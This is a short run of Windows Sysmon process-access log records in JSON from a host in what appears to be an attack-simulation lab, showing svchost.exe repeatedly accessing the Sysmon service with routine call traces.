{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1554,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1555,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1556,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1557,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1558,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1559,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1560,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1561,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
